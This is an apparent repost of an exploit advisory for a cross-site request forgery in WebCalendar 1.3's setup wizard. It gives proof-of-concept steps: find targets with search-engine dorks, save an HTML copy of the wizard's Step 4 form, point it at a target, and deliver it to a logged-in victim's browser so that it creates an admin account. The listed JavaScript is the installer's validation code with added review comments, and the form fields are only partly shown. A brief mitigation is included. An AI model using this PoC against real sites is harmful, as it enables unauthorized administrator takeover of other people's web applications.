
Published on August 4th, 2023 📆 | 8575 Views ⚑


WebCalendar 1.3 Cross Site Request Forgery – Torchsec



====================================================================================================================================
| # Title : WebCalendar v1.3 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://github.com/craigk5n/webcalendar/archive/master.zip |
| # Dork : WebCalendar v1.3 |
====================================================================================================================================

poc :

[+] Find candidate targets by dorking in Google or another search engine.

[+] The following HTML re-submits the setup wizard's Step 4 "Application Settings" form (which includes "Create Default Admin Account") to the target; opened by a victim's browser, it creates a new admin account via cross-site request forgery.

[+] Go to line 173 of the saved PoC (where the target site link is set), replace it with the target's URL, and save.

[+] Vulnerable file: install/index.php (the setup wizard). Mitigation: remove or block the install/ directory once setup is complete, and require a server-side anti-CSRF token on the wizard's form — the client-side JavaScript below performs only cosmetic validation and offers no protection.

[+] Example target URL: http://127.0.0.1/q7.3/admin/settings.php

[+] Save the code below as poc.html and deliver it to a browser that is logged in to the target.

[+]
"DTD/xhtml1-transitional.dtd">


WebCalendar Setup Wizard

/**
 * Opens the installer's phpinfo() view in a popup window.
 * Side effect only (window.open); returns nothing.
 * NOTE(review): serving phpinfo() from the install wizard discloses the
 * server configuration — confirm this action is unreachable once setup
 * is complete (e.g. the install/ directory is removed).
 */
function testPHPInfo() {
  var features = 'width=800,height=600,resizable=yes,scrollbars=yes';
  window.open( 'index.php?action=phpinfo', 'wcTestPHPInfo', features );
}
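/**
 * Client-side validation for the Step 4 "Application Settings" form.
 *
 * Checks, in order:
 *  - when the 'none' (single-user) authentication option is selected, a
 *    Single-User Login must be given;
 *  - Server URL must be non-empty and must end with '/'.
 * On failure it alerts, focuses the offending field and returns false.
 * On success it calls form.submit() and returns undefined.
 *
 * @param {HTMLFormElement} form - ignored: the body always validates
 *   document.form_app_settings (parameter kept for call-site compatibility).
 * @returns {boolean|undefined} false when validation fails.
 *
 * Fix: the loop index was an undeclared (implicit global) variable, which
 * leaks into window and throws a ReferenceError under strict mode.
 *
 * NOTE(review): these checks run in the browser only and are trivially
 * bypassed; they provide no protection for the server-side action. Any
 * anti-CSRF token must be verified by install/index.php itself, which is
 * not visible in this listing.
 */
function validate( form ) {
  var err = '';
  var listid = 0; // index of the 'none' (single-user) option
  var i;

  form = document.form_app_settings;

  // Locate the option representing single-user mode; the last match wins.
  for( i = 0; i < form.form_user_inc.length; i++ ) {
    if( form.form_user_inc.options[i].value === 'none' ) {
      listid = i;
    }
  }
  // A Single-User Login is only required when single-user mode is selected.
  if( form.form_user_inc.options[listid].selected &&
      form.form_single_user_login.value.length === 0 ) {
    alert( 'Error: You must specify a\nSingle-User Login.' );
    form.form_single_user_login.focus();
    return false;
  }
  if( form.form_server_url.value === '' ) {
    err += "Server URL is required.\n";
    form.form_server_url.select();
    form.form_server_url.focus();
  } else if( form.form_server_url.value.charAt( form.form_server_url.value.length - 1 ) !== '/' ) {
    err += "Server URL must end with a slash(/).\n";
    form.form_server_url.select();
    form.form_server_url.focus();
  }
  if( err !== '' ) {
    alert( "Error:\n\n" + err );
    return false;
  }
  // All checks passed: submit programmatically (original behaviour).
  form.submit();
}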
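/**
 * Shows or hides the 'singleuser' block depending on whether the
 * single-user ('none') authentication option is currently selected in
 * document.form_app_settings.
 * Relies on makeVisible()/makeInvisible() defined elsewhere on the page.
 *
 * Fix: the loop index was an undeclared (implicit global) variable, which
 * leaks into window and throws a ReferenceError under strict mode.
 */
function auth_handler() {
  var form = document.form_app_settings;
  var opts = form.form_user_inc.options;
  var listid = 0; // index of the 'none' (single-user) option
  var i;

  // Locate the single-user option; the last match wins.
  for( i = 0; i < form.form_user_inc.length; i++ ) {
    if( opts[i].value === 'none' ) {
      listid = i;
    }
  }
  if( opts[listid].selected ) {
    makeVisible( 'singleuser' );
  } else {
    makeInvisible( 'singleuser' );
  }
}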
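/**
 * Adjusts the "Database Name" field of document.dbform to the selected
 * database type: file-based engines (sqlite, sqlite3, ibase) get a wide
 * field labelled as a full path; everything else gets the short default.
 *
 * Fix: the original compared an undefined identifier `$db_type` (a PHP
 * variable that leaked into the emitted JavaScript) for the 'sqlite3'
 * case, so selecting any non-sqlite type threw a ReferenceError. The
 * comparison now uses the selected value like its neighbours.
 */
function db_type_handler() {
  var form = document.dbform;
  var selectvalue = form.form_db_type.value;
  var label = document.getElementById( 'db_name' );

  if( selectvalue === 'sqlite' || selectvalue === 'sqlite3' || selectvalue === 'ibase' ) {
    form.form_db_database.size = 65;
    // Constant literal, no untrusted data reaches innerHTML here.
    label.innerHTML = 'Database Name: Full Path (no backslashes)';
  } else {
    form.form_db_database.size = 20;
    label.innerHTML = 'Database Name: ';
  }
}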
/**
 * Rejects a database password containing '#'.
 * Reads document.dbform.form_db_password; on a hit it alerts, selects and
 * focuses the field and returns false, otherwise returns undefined.
 * NOTE(review): presumably '#' is excluded because the value is written
 * into a config file where it would start a comment — confirm against
 * install/index.php. Browser-side check only; the server must re-validate.
 */
function chkPassword() {
  var field = document.dbform.form_db_password;

  if( field.value.indexOf( '#' ) === -1 ) {
    return;
  }
  alert( 'The password contains illegal characters.' );
  field.select();
  field.focus();
  return false;
}
//]]> -->

WebCalendar Installation Wizard Step 4
This is the final step in setting up your WebCalendar Installation.
Application Settings

  • HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.





Create Default Admin Account:
(Admin Account Not Found)
Application Name:
Server URL:
User Authentication:
   Single-User Login:
Read-Only: Yes    
No
Environment:


Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
